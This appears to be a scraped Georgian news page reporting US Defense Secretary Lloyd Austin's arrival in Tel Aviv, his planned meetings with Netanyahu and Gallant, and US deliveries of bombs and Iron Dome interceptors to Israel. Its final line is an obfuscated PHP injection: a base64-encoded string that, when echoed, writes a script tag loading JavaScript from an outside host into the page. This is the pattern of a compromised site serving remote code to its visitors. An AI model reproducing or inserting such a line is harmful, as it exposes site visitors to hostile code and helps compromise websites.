celsiusi
ავერსი შნაიდერი

აშშ-ის თავდაცვის მდივანი ლოიდ ოსტინი თელ ავივში ჩავიდა. ინფორმაციას Timesofisrael-ი ავრცელებს.

ოსტინი აპირებს, შეხვდეს მთავრობის ლიდერებს და ნახოს აშშ-ის იარაღი და უსაფრთხოების დახმარება, რომელიც ვაშინგტონმა მიაწოდა ისრაელს.

როგორც მედია წერს, მოსალოდნელია, რომ ოსტინი შეხვდება ისრაელის პრემიერ-მინისტრს, ბენიამინ ნეთანიაჰუს და თავდაცვის მინისტრს, იოავ გალანტს.

თავდაცვის ოფიციალური პირები, რომლებიც ისრაელში ოსტინთან ერთად ჩავიდნენ, აცხადებენ, რომ აშშ-ის თავდაცვის მდივანს სურს, ხაზი გაუსვას აშშ-ის ურყევ მხარდაჭერას ისრაელელი ხალხის მიმართ. მათივე თქმით, აშშ მზადაა, დარწმუნდეს, რომ ქვეყანას ყველაფერი აქვს, რაც თავის დასაცავად სჭირდება.

თავდაცვის მაღალჩინოსანი ამბობს, რომ აშშ-მა უკვე მიაწოდა ისრაელს მცირე დიამეტრის ბომბები, ასევე ჩამჭრელი რაკეტები „რკინის გუმბათის“ სისტემისთვის, სხვა საბრძოლო მასალების მიწოდებას კი დღეს ელოდებიან.

286
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");